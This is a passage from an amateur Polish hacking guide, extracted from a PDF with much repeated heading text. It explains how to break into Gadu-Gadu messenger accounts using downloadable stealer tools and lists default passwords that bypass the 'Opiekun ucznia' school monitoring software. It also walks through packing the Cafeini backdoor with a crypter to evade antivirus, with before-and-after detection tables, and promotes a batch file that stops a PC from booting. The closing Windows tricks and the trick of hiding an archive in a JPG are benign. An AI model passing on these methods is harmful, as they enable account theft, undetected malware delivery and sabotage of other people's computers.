istniejąca skrzynka jest uŜywana. Brak odpowiedzi będzie świadczył, Ŝe konto nie jest  
uŜywane. Zostanie ono skasowane. 
 
...a jak nic nie wyjdzie...  
...Uruchamiamy programy BrutusA2 lub WWWhack itp. ... (choć jak dla mnie są tak samo skuteczne jak metoda 1) 
 

B)   

B)   

B)   

B)   Jak włamać się na gg

Jak włamać się na gg

Jak włamać się na gg

Jak włamać się na gg 

 

 

 

 

 

 

 

Mega prosty w obsłudze ale łatwo wykrywalny (moŜecie spróbować choć osobiście go nie sprawdzałem)  
Złodziej gg  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
A drugi to nasz kochany GG RPC2  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
oczywiście ściągnąć wszystko moŜna z mojego chomika 

http://chomikuj.pl/Mikul333/Hacking

 (hasło to: 

www.hackit.fora.pl) 
 

 

 

 

 

background image

 

 

 

 
 

 

 

 
 

 

 

 
C)   

C)   

C)   

C)   Hasła uciąŜliwych programów typu beniamin...

Hasła uciąŜliwych programów typu beniamin...

Hasła uciąŜliwych programów typu beniamin...

Hasła uciąŜliwych programów typu beniamin... 

 

 

 

 

 

 

 

Beniamin: 
Beniamina złamać moŜna nie zwykle prosto… 
 
no więc załóŜmy Ŝe mamy blokadę na youtube.pl 
  
wchodzimy więc w wiersz poleceń i wpisujemy coś takiego: 
  
ping www.youtube.pl  
 
wciskamy enter wyskoczy nam IP strony www.youtube.pl i teraz juŜ tylko przepisujemy IP do pasku adresu 
otworzy nam się youtube.pl 
 
Opiekun ucznia: 
hasło do programu opiekun to:  
zaq123  
qazwsxedc  
zaq!@wsx  
qaz1234  
qaz123  
zaq1@wsx  
zaq12wsx 
Są to standardowe haslo wbudowane w program, dziala niezaleznie od hasla ustawionego przez drugą osobe. 
 

Rozdział 6 „

Rozdział 6 „

Rozdział 6 „

Rozdział 6 „Nie wykrywalność czyli zaszyfrowanie wirusa

Nie wykrywalność czyli zaszyfrowanie wirusa

Nie wykrywalność czyli zaszyfrowanie wirusa

Nie wykrywalność czyli zaszyfrowanie wirusa”

” 

 

 

 

 

 

 

 

Przykładem wirusa do szyfrowania będzie cafeini 
Cały patent tu pokazy polega na uŜyciu cryptora PE w celu zamazania kodu.  
Zaczynamy…  pliki ściągnijcie i rozpakujcie dwóch roŜnych folderów na pulpicie  
                                                                                                                                              Uruchomcie program  
                                                                                                                                              Ntkrnl (nasz packer)  
                                                                                                                                                   
                                                                                                                                                1-2-3 wybieramy plik do                                                                                                      
                                                                                                                                                otwarcia (do zapisu 
                                                                                                                                               domyślenie ten sam) z                                                 
.                                                                                                                                              katalogu na pulpicie  i 
                                                                                                                                               otwieramy go. 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

background image

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

4- Wybieramy opcje szyfrowania, nie będę ich po kolei omawiał jeśli kogoś interesuje to lub ni wie o co chodzi 
polecam google.  
 
 
 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

5 -Klikamy start i gotowe (uwaga program nie robi domyślnie backup-ów więc najlepiej serwer sobie skopiować w 
inne miejsce.  

 

background image

B) Efekty

B) Efekty

B) Efekty

B) Efekty 

 

 

 

 

Antywirus      Wersja      Ostatnia aktualizacja      Wynik (Przed) 
AhnLab-V3        2007.9.8.0        2007.09.07         Win-Trojan/Cafeini.165888 
AntiVir         7.6.0.5         2007.09.08         BDS/Cafeini.11.Srv 
Authentium          4.93.8          2007.09.09       W32/Caffain.A 
Avast       4.7.1043.0       2007.09.08       Cafeini-11-GXsvr 
AVG       7.5.0.485       2007.09.09       BackDoor.Cafeini 
BitDefender       7.2       2007.09.09       GenPack:Backdoor.Cafeini.B 
CAT-QuickHeal        9.00       2007.09.08       Backdoor.Cafeini.11 
DrWeb        4.33       2007.09.09       BackDoor.Cafeini.11 
eSafe        7.0.15.0       2007.09.04       suspicious Trojan/Worm

 

 

 

 

eTrust-Vet       31.1.5119        2007.09.08       Win32/Cafeini.11 
Ewido        4.0       2007.09.09       Backdoor.Cafeini.11 
Fortinet        3.11.0.0       2007.09.08       W32/Cafeini.V11!tr.bdr 
F-Secure        6.70.13030.0       2007.09.09       Backdoor.Win32.Cafeini.b 
Ikarus       T3.1.1.12       2007.09.09       Backdoor.Win32.Cafeini.11 
Kaspersky       4.0.2.24       2007.09.09       Backdoor.Win32.Cafeini.b 
McAfee       5115       2007.09.07       BackDoor-GX.svr 
NOD32v2       2516       2007.09.09       Win32/Cafeini.11.Server 
Norman        5.80.02       2007.09.07       W32/CafeIni.1_1 
Panda        9.0.0.4       2007.09.09       Bck/Cafeini.11 
Sophos        4.21.0       2007.09.09       Troj/Cafeini-11 
Symantec       10       2007.09.09       Trojan Horse 
TheHacker        6.1.10.182       2007.09.08       Backdoor/GX.svr 
VirusBuster       4.3.26:9       2007.09.09        Backdoor.Cafeini.D 
Webwasher-Gateway       6.0.1       2007.09.08       Trojan.Cafeini.11.Srv 
 
************************************************************  
Po Szyfrowaniu 
 
AhnLab-V3       2007.9.8.0       2007.09.07        - 
AntiVir        7.6.0.5       2007.09.08       TR/Crypt.XPACK.Gen 
Authentium       4.93.8       2007.09.09        - 
Avast        4.7.1043.0       2007.09.08       - 
AVG       7.5.0.485       2007.09.09        - 
BitDefender       7.2       2007.09.09       - 
CAT-QuickHeal       9.00       2007.09.08       (Suspicious) - DNAScan 
DrWeb       4.33        2007.09.09        - 
eSafe        7.0.15.0       2007.09.04       Suspicious Trojan/Worm 
eTrust-Vet        31.1.5119       2007.09.08        - 
Ewido        4.0       2007.09.09       - 
Fortinet        3.11.0.0       2007.09.08       - 
F-Secure       6.70.13030.0       2007.09.09       - 
Ikarus          T3.1.1.12       2007.09.09        - 
Kaspersky       4.0.2.24       2007.09.09       - 
McAfee        5115        2007.09.07       - 
NOD32v2       2516       2007.09.09        - 
Norman        5.80.02       2007.09.07       - 
Panda       9.0.0.4       2007.09.09       Suspicious file 
Sophos        4.21.0       2007.09.09        - 
Symantec        10        2007.09.09       W32.IRCBot.Gen 
TheHacker       6.1.10.182       2007.09.08       - 
VirusBuster        4.3.26:9       2007.09.09        - 
Webwasher-Gateway       6.0.1       2007.09.08       Trojan.Crypt.XPACK.Gen 

background image

C) 

C) 

C) 

C)   

  

  

  Jak juŜ jesteśmy w niewykrywalności kilka programów

Jak juŜ jesteśmy w niewykrywalności kilka programów

Jak juŜ jesteśmy w niewykrywalności kilka programów

Jak juŜ jesteśmy w niewykrywalności kilka programów 

 

 

 

 
Takim wirkiem jest bardzo fajny autoexit (do pobrania z mojego chomika www.chomikuj.pl/mikul333/prywatne 
hasło : www.hackit.fora.pl) Tworzy bata który dopisuje się do autostartu i nie pozwala na start systemu (nie jestem 
pewien ale chyba na zasadzie shutdowna czyli jak komp się włączy to się automatycznie wylączy…) Co do nie 
wykrywalności to : skanowałem najnowszym nortonem nic, kasperski nic, a avast to juŜ w ogóle nic… 

 

 

 

 

Rozdział 7

Rozdział 7

Rozdział 7

Rozdział 7 

 

 

 „Triki na Windowsie”

„Triki na Windowsie”

„Triki na Windowsie”

„Triki na Windowsie” 

 

 

 

 

A)

A)

A)

A)   Niewidzialny folder

   Niewidzialny folder

   Niewidzialny folder

   Niewidzialny folder 

 

 

 

 

 

 

 

 

Tworzymy nowy folder wchodzimy w właściwości −> dostosowywanie −> zmień ikonę i wybieramy pustą, Ŝeby 
nazwa folderu zniknęła klikamy zmień nazwę i zmieniamy ją na coś takiego: klikamy i przytrzymujemy prawy alt i 
wpisujemy na prawej klawiaturze numerowej 0160 
 

B)

B)

B)

B)   

   

   

   Własny napis obok zegarka

Własny napis obok zegarka

Własny napis obok zegarka

Własny napis obok zegarka 

 

 

 

 

 

 

 

 
Po pierwsze wchodzimy w regedita...  
 
Następnie wchodzimy do:  
 
HKEY_CURRENT_USER / Control Panel / International / szukamy sTimeFormat i klikamy prawym przyciskiem 
myszki i modyfikuj  
 
Gdy juŜ klikniemy modyfikuj w sTimeFormat pojawi nam się okno:  
 
pisze w nim coś takiego:  
 
HH:mm:ss  
 
my robimy spacje i dopisujemy tt:  
 
HH:mm:ss tt  
 
klikamy ok  
 
Aby zakończyć nasze "dzieło" w tej samej zakładce szukamy jeszcze s1159 i s2359, klikamy dwa razy i dodajemy 
w dwóch wierszach własny napis (w wierszu s1159, s2359 napisy muszą być identyczne).  
 
JeŜeli chcemy ujrzeć efekt naszej pracy, naleŜy wylogować się i ponownie zalogować. 

 

 

 

 
C) 

C) 

C) 

C)   

  

  

  Plik o określonej w bajtach przez nas wielk

Plik o określonej w bajtach przez nas wielk

Plik o określonej w bajtach przez nas wielk

Plik o określonej w bajtach przez nas wielkości

ości

ości

ości 

 

 

 

 

 

 

 

JeŜeli chcemy stworzyć plik, który będzie miał dokładnie określoną liczbę bajtów moŜemy to zrobić poprzez Start 
−> Uruchom, a następnie wpisanie komendy :  
 
fsutil file createnew c:\x.txt Z  
 
Gdzie c:\x.txt to lokalizacja i nazwa pliku, który chcemy stworzyć. „Z” to natomiast liczba bajtów, która określa 
wielkość naszego pliku.  
 
Wielkość pliku podaje się w bajtach czyli np.  
 
fsutil file createnew c:\x.txt 100  
 
to będzie 100bajtów czyli jeden kilobajt 
 

background image

D)

D)

D)

D)   Własna komenda w uruchom

   Własna komenda w uruchom

   Własna komenda w uruchom

   Własna komenda w uruchom 

 

 

 

 

 

 

 

Wszystkie komendy to nic innego jak nazwy plików o rozszerzeniu .exe z katalogu  
 
C:\Windows\System32\  
 
i w tym właśnie katalogu moŜemy umieścić własne aplikacje. Zrobimy to za pomocą bata 
Taki jest jego kod: 
 
@echo off  
start "AIMP2" "C:\Program Files\AIMP2\AIMP2.exe"  
exit  
 
zapisać go w katalogu:  
 
C:\Windows\System32\  
 
nazwa którą nadamy temu plikowi będzie komendą którą będziemy mogli uruchamiać nasz program. W tym 
przypadku chodzi o program AIMP2, więc nazwa pliku wygląda tak:  
 
AIMP2.bat  
 
teraz wystarczy wpisać w menu start > uruchom  
AIMP2  
i juŜ moŜemy się cieszyć naszym programem:]  
 
analogicznie sprawa będzie wyglądać dla kaŜdego innego programu, który zechcemy uruchomić. 
 
 

Rozdział 7 „

Rozdział 7 „

Rozdział 7 „

Rozdział 7 „Steganografia

Steganografia

Steganografia

Steganografia”

 

 

A)

A)

A)

A)   Co to jest s

   Co to jest s

   Co to jest s

   Co to jest steganografia

teganografia

teganografia

teganografia...

...

...

... 

 

 

 

 

(ciocia wikipedia) : Steganografia jest nauką o komunikacji w taki sposób by obecność komunikatu nie 
mogła zostać wykryta. W odróŜnieniu od kryptografii (gdzie obecność komunikatu nie jest negowana 
natomiast jego treść jest niejawna) steganografia próbuje ukryć fakt prowadzenia komunikacji. 
 
a po ludzku np ukrywanie tekstu lub programu w obrazku… moŜna komuś wysłać program w 
rzeczywistości przesyłając mu zdjęcie Ŝaby w rozdzielczości wypasionego plakatu 
 

B)

B)

B)

B)   

   

   

   Jak ukryć plik, tekst lub coś innego w obrazku

Jak ukryć plik, tekst lub coś innego w obrazku

Jak ukryć plik, tekst lub coś innego w obrazku

Jak ukryć plik, tekst lub coś innego w obrazku 

 

 

 

PokaŜe wam metodę którą sa

PokaŜe wam metodę którą sa

PokaŜe wam metodę którą sa

PokaŜe wam metodę którą sam uŜywam

m uŜywam

m uŜywam

m uŜywam...

...

...

... 

 

 

  

 

 

 

 

 

 

 
 

 

 

 

Są 2 sposoby (tyle znam) : 1 jest łatwy i wypasiony a 2 trudny i umiem jego pomącą ukryć tekst (ale go z 
powrotem odczytać to juŜ nie ;P)  
 
No więc ukrywamy (to co tam chcemy) w obrazku za pomocą wirsza poleceń  
 
 
Co musimy mieć :  
 
archiwum rar z plikami które chcemy przesłać i jakieś zdjęcie  
 
ZałóŜmy Ŝe naszym zdjęciem będzie plik secret.jpg a archiwum program.rar  
 
 

background image

Napisze w punktach:  
 
1. Jak juz mówiłem robimy winrarem archiwum w którym są pliki do przesłania  
 
2. śeby bylo łatwiej kopiujemy rara i secret.jpg do jednego folderu najlepiej do C:\nazwa folderu  
 
3. Uruchamiamy wiersz poleceń (start -> uruchom -> cmd)  
 
4. W wirszu piszemy coś takiego :  
  
cd C:\nazwa folderu 
 
Uwaga to najwaŜniejsze  
 
5.Poleceniem copy kopiujemy zawartość plików top secret.jpg oraz program.rar do pliku docelowego:  
  
copy /B secret.jpg+program.rar wynik.jpg 
 

 

  
 
No i gotowe  
 
ś

eby odczytać co tam mamy w środku uruchamiamy program Win Rar znajdujemy plik wynik.jpg i 

klikamy na niego i wypakowujemy pliki (normalnie gdy klikniemy na plik prawym przyciskiem myszki 
nie ma tej opcji i wygląda dokładnie tak samo jak normalne zdjęcie) 
 

Rozdział 8 „Podziękowania itp.”

Rozdział 8 „Podziękowania itp.”

Rozdział 8 „Podziękowania itp.”

Rozdział 8 „Podziękowania itp.” 

 

 

 

 

 

 

 
A)

A)

A)

A)   No jak w temacie (podziękowania itp.) 

   No jak w temacie (podziękowania itp.) 

   No jak w temacie (podziękowania itp.) 

   No jak w temacie (podziękowania itp.)  

 

 

 

 
Dziękuje wszystkim uŜytkownikom mojego forum…  
 
 

KONIE

KONIE

KONIE

KONIEC PORADNIKA

C PORADNIKA

C PORADNIKA

C PORADNIKA